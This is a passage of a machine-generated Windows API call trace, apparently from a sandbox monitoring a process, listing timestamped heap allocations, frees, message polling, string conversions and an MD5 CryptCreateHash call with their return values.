returned 0xf [0214.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0214.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0214.030] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0214.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0214.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0214.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0214.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0214.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0214.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0214.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0214.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0214.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0214.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0214.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0214.102] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0214.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0214.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0214.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d88 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ed8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0214.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: 